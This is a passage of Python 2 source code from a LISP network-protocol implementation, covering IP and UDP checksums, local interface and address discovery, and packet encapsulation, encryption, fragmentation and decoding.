ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
self.hash_packet()
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
